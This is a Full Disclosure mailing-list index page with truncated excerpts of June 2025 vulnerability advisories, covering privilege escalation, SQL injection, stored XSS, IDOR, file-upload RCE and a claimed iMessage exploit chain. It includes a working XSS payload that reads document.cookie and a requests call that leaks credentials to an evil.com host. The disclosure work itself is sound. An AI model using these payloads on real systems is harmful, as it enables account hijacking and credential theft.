Full Disclosure

Posted by SEC Consult Vulnerability Lab via Fulldisclosure on Jun 09SEC Consult Vulnerability Lab Security Advisory < 20250604-0 > ======================================================================= title: Local Privilege Escalation and Default Credentials product: INDAMED – MEDICAL OFFICE (Medical practice management) Demo version vulnerable version: Revision 18544 (II/2024) fixed version: Q2/2025 (Privilege Escalation, Default Password)…

Posted by josephgoyd via Fulldisclosure on Jun 09Hello Full Disclosure, This is a strategic public disclosure of a zero-click iMessage exploit chain that was discovered live on iOS 18.2 and remained unpatched through iOS 18.4. It enabled Secure Enclave key theft, wormable remote code execution, and undetectable crypto wallet exfiltration. Despite responsible disclosure, the research was suppressed by the vendor. Apple issued a silent fix in iOS 18.4.1 (April 2025) without public…

Posted by Stefan Kanthak on Jun 03Hi @ll, user group policies are stored in DACL-protected registry keys [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies] respectively [HKEY_CURRENT_USER\Software\Policies] and below, where only the SYSTEM account and members of the “Administrators” user group are granted write access. At logon the user’s registry hive “%USERPROFILE%\ntuser.dat” is loaded with exclusive (read, write and…

Posted by Sanjay Singh on Jun 03Hello Full Disclosure list, I am sharing details of a newly assigned CVE affecting an open-source educational software project: ———————————————————————— CVE-2025-45542: Time-Based Blind SQL Injection in CloudClassroom PHP Project v1.0 ———————————————————————— Product: CloudClassroom PHP Project Vendor:…

Posted by Ron E on Jun 03An authenticated attacker can inject JavaScript into the bio field of their user profile. When the profile is viewed by another user, the injected script executes. *Proof of Concept:* POST /api/method/frappe.desk.page.user_profile.user_profile.update_profile_info HTTP/2 Host: –host– profile_info={“bio”:”\”><img src=x onerror=alert(document.cookie)>”}

Posted by Ron E on Jun 03An authenticated user can inject malicious JavaScript into the user_image field of the profile page using an XSS payload within the file path or HTML context. This field is rendered without sufficient sanitization, allowing stored script execution in the context of other authenticated users. *Proof of Concept:*POST /api/method/frappe.desk.page.user_profile.user_profile.update_profile_info HTTP/2 Host: –host–…

Posted by Qualys Security Advisory via Fulldisclosure on Jun 03Qualys Security Advisory Local information disclosure in apport and systemd-coredump (CVE-2025-5054 and CVE-2025-4598) ======================================================================== Contents ======================================================================== Summary Mitigation Local information disclosure in apport (CVE-2025-5054) – Background – Analysis – Proof of concept Local information disclosure in systemd-coredump…

Posted by Andrey Stoykov on Jun 03# Exploit Title: Stored XSS via File Upload – adaptcmsv3.0.3 # Date: 06/2025 # Exploit Author: Andrey Stoykov # Version: 3.0.3 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ Stored XSS via File Upload #1: Steps to Reproduce: 1. Login with low privilege user and visit “Profile” > “Edit Your Profile” 2. Click on “Choose File” and upload the following file html-xss.html <!DOCTYPE html>…

Posted by Andrey Stoykov on Jun 03# Exploit Title: IDOR “Change Password” Functionality – adaptcmsv3.0.3 # Date: 06/2025 # Exploit Author: Andrey Stoykov # Version: 3.0.3 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ IDOR “Change Password” Functionality #1: Steps to Reproduce: 1. Login as user with low privilege and visit profile page 2. Select “Edit Your Profile” and click “Submit” 3. Trap the HTTP POST request 4. Set…

Posted by Andrey Stoykov on Jun 03# Exploit Title: Stored XSS “Send Message” Functionality – adaptcmsv3.0.3 # Date: 06/2025 # Exploit Author: Andrey Stoykov # Version: 3.0.3 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ Stored XSS “Send Message” Functionality #1: Steps to Reproduce: 1. Login as normal user and visit “Profile” > “Message” > “Send Message” 2. In “Message” field enter the…

Posted by Andrey Stoykov on Jun 03# Exploit Title: Authenticated File Upload to RCE – adaptcmsv3.0.3 # Date: 06/2025 # Exploit Author: Andrey Stoykov # Version: 3.0.3 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ Authenticated File Upload to RCE #1: Steps to Reproduce: 1. Login as admin user and visit “System” > “Appearance” > “Themes” > “Default” > “Theme Files” and choose “Add New File”…

Posted by Andrey Stoykov on Jun 03# Exploit Title: Stored XSS in “Description” Functionality – cubecartv6.5.9 # Date: 05/2025 # Exploit Author: Andrey Stoykov # Version: 6.5.9 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ Stored XSS #1: Steps to Reproduce: 1. Visit “Account” > “Address Book” and choose “Edit” 2. In the “Description” parameter enter the following payload…

Posted by Michał Majchrowicz via Fulldisclosure on Jun 03Security Advisory Vulnerabilities reported to vendor: March 13, 2025 Vendor requested additional information: March 20, 2025 Additional information provided to vendor: March 22, 2025 Vendor confirmed the reported issues but rejected them: March 31, 2025 Additional information provided to vendor: May 6, 2025 Vendor confirmed the reported issues but rejected them: May 15, 2025 Vendor closed the tickets for all reported issues: May 16, 2025 Public…

Posted by Juho Forsén via Fulldisclosure on Jun 03The PSF requests library (https://github.com/psf/requests & https://pypi.org/project/requests/) leaks .netrc credentials to third parties due to incorrect URL processing under specific conditions. Issuing the following API call triggers the vulnerability: requests.get(‘http://example.com:@evil.com/&apos;) Assuming .netrc credentials are configured for example.com, they are leaked to evil.com by the call. The root cause is…

Posted by Housma mardini on Jun 03Hi, I am submitting an exploit for *CVE-2019-9978*, a remote code execution vulnerability in the Social Warfare WordPress plugin (version <= 3.5.2). *Exploit Title*: CVE-2019-9978: Remote Code Execution in Social Warfare WordPress Plugin (<= 3.5.2) *Date*: 2025-05-20 *Exploit Author*: Huseyin Mardinli *Vendor Homepage*: https://warfareplugins.com/ *Software Link*: https://wordpress.org/plugins/social-warfare/ *Version*: <= 3.5.2…